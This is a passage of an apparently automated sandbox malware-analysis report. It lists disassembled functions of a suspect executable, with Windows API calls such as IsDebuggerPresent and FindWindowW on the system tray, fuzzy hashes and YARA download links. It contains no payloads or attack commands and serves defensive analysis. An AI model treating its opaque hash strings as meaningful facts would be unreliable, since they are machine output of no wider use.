                                                    • Instruction Fuzzy Hash: 37110C719007089FC710DFAAD88489AF7F8FF08310B50862FE58AD7651E771AA48CFA4
                                                    Function 006A953C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A954C
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9564
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: 79c9c682826fa668cc9c30146b609ad9020ea543123e65361e0a4570594c81bd
                                                    • Instruction ID: 21ec5c7b84466805756301d64268c1e1f96c58e3bb521d0980c58263f936e019
                                                    • Opcode Fuzzy Hash: 79c9c682826fa668cc9c30146b609ad9020ea543123e65361e0a4570594c81bd
                                                    • Instruction Fuzzy Hash: 3AE02B35F4235176F23126258C4BFD71F0BDB8BB61F208035B702991D1C9D24D428AB0
                                                    Function 006B4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: b647503e6e042de51781fd1119a85ed4909f647ba474854e4d93fa74304ca2cd
                                                    • Instruction ID: b2fb174bd0f6e437826875cf41be598627ebabc6fa470f24b730039e782ce1bb
                                                    • Opcode Fuzzy Hash: b647503e6e042de51781fd1119a85ed4909f647ba474854e4d93fa74304ca2cd
                                                    • Instruction Fuzzy Hash: 8BE02272A002282AE3209B99AC09BE7FBACEB84B60F00002BFC04D3181D9709A5187E4
                                                    Function 0068B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0068B314: _memset.LIBCMT ref: 0068B321
                                                      • Part of subcall function 00670940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0068B2F0,?,?,?,0065100A), ref: 00670945
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0065100A), ref: 0068B2F4
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0065100A), ref: 0068B303
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0068B2FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
                                                    • Opcode ID: 334da24efc802147e95e3a87e0af9e090656dcbcfd73bc128a2f9d4b9bb4fa3e
                                                    • Instruction ID: 11a018b10f74ea612a74c51cec1e74686e269a1cf7d59ceee934a4f09b4a3d5d
                                                    • Opcode Fuzzy Hash: 334da24efc802147e95e3a87e0af9e090656dcbcfd73bc128a2f9d4b9bb4fa3e
                                                    • Instruction Fuzzy Hash: AEE06DB0600702CBE760AF28D8043427BE6BF04304F059A2DE856C7290E7B4D448CBA1
                                                    Function 00691935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00691775
                                                      • Part of subcall function 006CBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0069195E,?), ref: 006CBFFE
                                                      • Part of subcall function 006CBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006CC010
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0069196D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: 703e8976f07d3c0af1bb3e1602a3e9f2fae8d2b3dbb5c669ec02abfd590a8cde
                                                    • Instruction ID: 26696a7777a949c6f6e050a5dccbf2079959dbe1ba08bff71e244134c105831b
                                                    • Opcode Fuzzy Hash: 703e8976f07d3c0af1bb3e1602a3e9f2fae8d2b3dbb5c669ec02abfd590a8cde
                                                    • Instruction Fuzzy Hash: A7F0C97080110ADFDF15DB95C984AECBBFEEB09301F64109AE112AA590D7754F85DF64
                                                    Function 006D5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006D596E
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006D5981
                                                      • Part of subcall function 006B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 28898d48f25f73d09cc2c72433af89364f5d27bd1f590245d2fa66cdf56f43c2
                                                    • Instruction ID: 27e9b4030ebaf0a699ef9284a2ecbebaccb3481acd841bbf9601473cafa92951
                                                    • Opcode Fuzzy Hash: 28898d48f25f73d09cc2c72433af89364f5d27bd1f590245d2fa66cdf56f43c2
                                                    • Instruction Fuzzy Hash: 99D0C975785311B6EBA4BB70AC1BFD66A56AB10B50F04192AB34AAA1D0C9E49800C658
                                                    Function 006D5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006D59AE
                                                    • PostMessageW.USER32(00000000), ref: 006D59B5
                                                      • Part of subcall function 006B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 914e3a794410a4aa8cfe54e58c80ba36ba878fff0500f539659896b421243f24
                                                    • Instruction ID: fbb26d8d97b5b0180dfbd4a95fd196c202f397aabdf0d94d428359c607df14a8
                                                    • Opcode Fuzzy Hash: 914e3a794410a4aa8cfe54e58c80ba36ba878fff0500f539659896b421243f24
                                                    • Instruction Fuzzy Hash: 01D0C971782311BAEBA4BB70AC0BFD66656AB14B50F04192AB346EA1D0C9E4A800C658
                                                    Function 006A93DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006A93E9
                                                    • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 006A93F7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: f85d346602e754441b391828d66f982930cec315e1ff2fac421241d32af4a418
                                                    • Instruction ID: 7819d8f956c08c9c5b5d66b47f0046121c0e3428924c848a3be66a2b927eeb29
                                                    • Opcode Fuzzy Hash: f85d346602e754441b391828d66f982930cec315e1ff2fac421241d32af4a418
                                                    • Instruction Fuzzy Hash: 03C002315421C0BAEB211B77AC0DD873E3EE7CBF52711516DB212954B586654095D624